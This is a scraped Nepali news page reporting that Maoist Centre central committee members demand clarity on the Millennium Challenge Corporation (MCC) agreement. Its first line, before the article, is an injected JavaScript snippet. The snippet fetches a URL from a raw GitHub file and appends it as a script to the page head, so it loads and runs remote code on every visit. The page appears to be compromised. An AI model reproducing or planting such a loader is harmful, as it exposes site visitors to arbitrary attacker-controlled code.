;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); माओवादी बैठक: केन्द्रीय सदस्यहरुले (एमसीसी)बारे प्रष्ट पार्न माग – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • माओवादी बैठक: केन्द्रीय सदस्यहरुले (एमसीसी)बारे प्रष्ट पार्न माग
Breaking News

माओवादी बैठक: केन्द्रीय सदस्यहरुले (एमसीसी)बारे प्रष्ट पार्न माग

जुनेली न्यूज, काठमाडौं । शनिबारदेखि शुरु भएको नेकपा माओवादी केन्द्रका केन्द्रीय कमिटी बैठकमा अध्यक्ष पुष्पकमल दाहाल प्रचण्डले पेश गरेको राजनीतिक तथा सांगठनिक प्रतिवेदनमा ‘एमसीसी, लिपुलेक, कालापानी र लिम्पियाधुराको प्रश्नलाई पार्टीको घोषित नीति अनुसार कूटनीतिक सम्वादका माध्यमबाट हल गर्न प्रयत्न गर्ने’ मात्र भनिएको जनाएको छ |
त्यस्तै माओवादी केन्द्रका केन्द्रीय सदस्यहरुले मिलेनियम च्यालेन्ज कर्पोरेसन (एमसीसी)बारे प्रष्ट पार्न माग गरेका छन् ।

तर समूहगत छलफलको निष्कर्ष प्रस्तुत गर्दै टोली नेताहरुले एमसीसीबारे प्रष्ट पार्न माग गरेका हुन् । ‘छलफमा कतिपयले एमसीसी सम्झौता खारेज गर्नुपर्छ भनेका छन् यो रास्ट्रको हित बिपरित छ भनेका छन् | तर कतिपयले परिमार्जनसहित पास गर्नुपर्छ पनि भनेका छन्’ | प्रतिवेदनको बिषयमा ‘अध्यक्षको प्रतिवेदन एकदमै छोटो छ । यसबारे प्रष्ट आओस् भनेका छौं ।’एक केन्द्रीय सदस्यले सोधेका छन् |

फेसबुक प्रतिक्रियाहरु